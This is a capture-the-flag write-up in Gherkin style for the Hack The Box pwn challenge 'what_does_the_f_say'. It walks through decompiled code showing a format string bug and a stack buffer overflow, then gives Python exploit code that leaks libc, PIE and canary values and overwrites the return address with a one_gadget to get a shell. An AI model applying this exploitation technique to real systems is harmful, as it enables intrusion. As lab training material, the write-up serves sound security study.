## Version 2.0
## language: en

Feature: what_does_the_f_say
  Site:
    Hackthebox
  Category:
    Pwn
  User:
    lkkpp
  Goal:
    Get shell and read the flag

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 16.04.4   |
    | gdb-pwndbg      | 1.1.0     |
    | VMware          | 15.5.6    |
    | Python          | 3.6.9     |
    | IDA             | 7.2       |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its section
    When I open the challenge section
    Then it is possible to download the challenge

  Scenario: Sucess:Analyze the binary and finding bugs
    Given the source code is not provided
    When I downloaded the binary
    And I get information from the challenge
    """
    $ file what_does_the_f_say
    what_does_the_f_say: ELF 64-bit LSB shared object, x86-64,
    version 1 (SYSV), dynamically linked, interpreter
    /lib64/ld-linux-x86-64.so.2,
    BuildID[sha1]=dd622e290e6b1ac53e66369b85805ccd8a593fd0,
    for GNU/Linux 3.2.0, not stripped
    """
    Then I analyze it with IDA [evidences](main.png)
    """
    int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
    {
      setup();
      welcome();
      fox_bar();
    }
    """
    When I see the fox_bar() function [evidences](fox_bar.png)
    And I inspected the drinks_menu() sub-function
    """
    unsigned __int64 drinks_menu()
    {
      int v0; // xmm0_4
      int v1; // xmm0_4
      int option; // [rsp+Ch] [rbp-34h]
      char s[40]; // [rsp+10h] [rbp-30h]
      unsigned __int64 v5; // [rsp+38h] [rbp-8h]

      v5 = __readfsqword(0x28u);
      memset(s, 0, 0x1EuLL);
      puts("\n1. Milky way (4.90 s.rocks)\n"
           "2. Kryptonite vodka (6.90 s.rocks)\n"
           "3. Deathstar(70.00 s.rocks)");
      __isoc99_scanf("%d", &option);
      if ( option == 1 )
      {
        *(float *)&v0 = *(float *)&srocks - 4.9;
        srocks = v0;
        srock_check();
        if ( *(float *)&srocks <= 20.0 )
          puts("\nYou have less than 20 space rocks!");
        enjoy((__int64)"Milky way");
      }
      else if ( option == 2 )
      {
        srock_check();
        puts("\nRed or Green Kryptonite?");
        read(0, s, 0x1DuLL);
        printf(s);                                  // FSB
        warning();
      }
      else
      {
        if ( option != 3 )
        {
          puts("Invalid option!");
          goodbye();
        }
        *(float *)&v1 = *(float *)&srocks - 69.98999999999999;
        srocks = v1;
        srock_check();
        if ( *(float *)&srocks <= 20.0 )
          puts("\nYou have less than 20 space rocks!");
        enjoy((__int64)"Deathstar");
      }
      return __readfsqword(0x28u) ^ v5;
    }
    """
    Then I notice a Format String Bug when triggering option two
    """
    else if ( option == 2 )
    {
      srock_check();
      puts("\nRed or Green Kryptonite?");
      read(0, s, 0x1DuLL);
      printf(s);                        // Format String Bug
      warning();
    }
    """
    When I keep parsing the "warning" function
    And I notice a call to scanf("%s", buf) and this usage is unsafe
    """
    ...
    else
    {
      puts("\nYou have less than 20 space rocks!"
           "Are you sure you want to buy it?");
      __isoc99_scanf("%s", &s1);                  // Stack Buffer Overflow
      if ( !strcmp(&s1, "yes") )
      {
        *(float *)&v0 = *(float *)&srocks - 6.9;
        srocks = v0;
        srock_check();
        enjoy((__int64)"Kryptonite vodka");
      }
    ...
    """
    Then this indicates that there is an FSB and Stack Buffer Overflow

  Scenario: Success: Leaking pointers
    Given that the binary has all the protections
    """
    pwndbg> checksec
    [*] 'what_does_the_f_say'
        Arch:     amd64-64-little
        RELRO:    Full RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      PIE enabled

    pwndbg>
    """
    Then get leaks is necessary to exploit the binary
    And for that I can exploit the FSB (Format String Bug)
    Then I used Python for this
    """
    p.sendline('%41$p %15$p %17$p')
    leak = p.recvline().split(b' ')
    libc = leak[0].decode()
    pie = leak[1].decode()
    canary = leak[2].decode()

    print ("Libc leak @", libc)
    print ("Pie @ ", pie)
    print ("Canary @", canary)
    """

  Scenario: Success: Exploiting the Stack Buffer Overflow
    Given the binary is vulnerable to BoF
    When my idea is exploit it and use the leaks obtained
    And this phase is very trivial and highly known
    Then I used python and a one_gadget for execve('/bin/sh', NULL, NULL)
    """
    libc_base = int(libc, 16) - 0x401783
    one_gadget = libc_base + 0x4f365

    print ("Libc base @", hex(libc_base))
    print ("one_gadget @", hex(one_gadget))

    payload = b''
    payload += b'A' * 24
    payload += p64(int(canary, 16))
    payload += b'B' * 8
    payload += p64(one_gadget)

    p.sendline(payload)

    p.interactive()
    """ [evidences](pwned.png)
